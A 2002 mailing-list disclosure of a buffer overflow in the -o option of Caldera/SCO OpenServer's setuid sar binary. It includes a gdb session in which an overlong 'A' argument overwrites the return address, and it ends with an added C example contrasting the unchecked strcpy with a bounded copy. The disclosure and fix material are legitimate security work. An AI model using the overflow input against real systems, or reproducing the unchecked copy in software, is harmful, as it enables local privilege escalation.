From: KF (dotslashsnosoft.com)
Date: Thu May 09 2002 - 04:29:43 CDT

    Caldera recently released an update for the suid sar binary. At one point in time someone pointed out that sar -f had an overflow (Brock Tellier or k2 probably, I can't remember). The -f overflow was fixed, but the -o option (which I have seen in private security advisories floating around) also had an overflow, and I don't think anyone ever told Caldera / SCO. I haven't gotten around to finishing up the exploit, but here are the details for those of you that are interested.

    SecurityFocus BID: http://online.securityfocus.com/advisories/4089
    Caldera fix: ftp://stage.caldera.com/pub/security/openserver/CSSA-2002-SCO.17

    Exploit details:

    Starting program: //home/kevin//./sar -o `perl -e 'print "A" x 2104'`
    //home/kevin//./sar: Cannot create file
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    ...
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.l

    Program exited with code 01.

    Try again with one more char.

    (gdb) r -o `perl -e 'print "A" x 2105'`
    Starting program: //home/kevin//./sar -o `perl -e 'print "A" x 2105'`

    Program received signal SIGSEGV, Segmentation fault.
    0x80021c2d in getenv ()
    (gdb) bt
    #0 0x80021c2d in getenv ()
    #1 0x8001f2da in _tz_info ()
    #2 0x8004e5c2 in tzset ()
    #3 0x8004e4ba in _localtime_r ()
    #4 0x8001db5f in localtime ()
    #5 0x804a124 in memset ()
    #6 0x41414141 in ?? ()
    Cannot access memory at address 0x41414141.
    (gdb) frame 6
    #6 0x41414141 in ?? ()
    (gdb) i r
    eax 0x8001db20 -2147362016
    ecx 0x54 84
    edx 0x804765c 134510172
    ebx 0x0 0
    esp 0x80463d4 0x80463d4
    ebp 0x41414141 0x41414141
    esi 0x804764c 134510156
    edi 0x0 0
    eip 0x41414141 0x41414141
    ps 0x10206 66054
    cs 0x17 23
    ss 0x1f 31
    ds 0x1f 31
    es 0x1f 31
    fs 0x0 0
    gs 0x0 0

    -KF
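The bug class behind the crash above, shown as an added illustration that is not part of KF's post and not Caldera's sar source (which the post does not include): an option argument copied into a fixed stack buffer with no length check, next to a bounded version that refuses overlong input. The 2104/2105 boundary is taken from the post's probe; the buffer size, function names and the sample path are assumptions.

```c
/* Added example, not code from the post or from SCO/Caldera. Models the
 * sar -o defect KF describes: the argument is copied into a fixed stack
 * buffer, so an argument longer than the buffer runs into the saved frame
 * pointer and return address, which is why gdb shows ebp and eip as
 * 0x41414141 for the 2105-byte argument. */
#include <stdio.h>
#include <string.h>

/* Assumed: the longest -o argument the post shows surviving (2104 bytes);
 * the real buffer size is not given in the post. */
#define OUTFILE_MAX 2104

/* "Before": the shape of the defect. Never invoked in this example. */
void copy_outfile_unchecked(char *dst, const char *arg)
{
    strcpy(dst, arg);   /* no bound: writes past dst for strlen(arg) > OUTFILE_MAX */
}

/* "After": copy only if the argument plus its NUL fits in dst.
 * Returns 0 on success, -1 (and leaves dst untouched) if it is too long. */
int copy_outfile_checked(char *dst, size_t dstlen, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= dstlen)
        return -1;
    memcpy(dst, arg, n + 1);
    return 0;
}

/* Reproduces the post's probe against the checked copy: build an argument
 * of `len` 'A' bytes (constructed input) and report the copy's outcome.
 * 2104 -> 0 (fits), 2105 -> -1 (rejected instead of smashing the stack). */
int checked_copy_outcome(size_t len)
{
    static char arg[4096];
    char outfile[OUTFILE_MAX + 1];     /* room for OUTFILE_MAX bytes + NUL */

    if (len >= sizeof arg)
        return -1;                     /* cannot even build the probe */
    memset(arg, 'A', len);
    arg[len] = '\0';
    return copy_outfile_checked(outfile, sizeof outfile, arg);
}

int main(int argc, char **argv)
{
    char outfile[OUTFILE_MAX + 1];
    const char *arg = argc > 1 ? argv[1] : "/tmp/sa09";   /* assumed sample path */

    if (copy_outfile_checked(outfile, sizeof outfile, arg) != 0) {
        fprintf(stderr, "sar: output file name too long (max %d bytes)\n", OUTFILE_MAX);
        return 1;
    }
    printf("output file: %s\n", outfile);
    return 0;
}
```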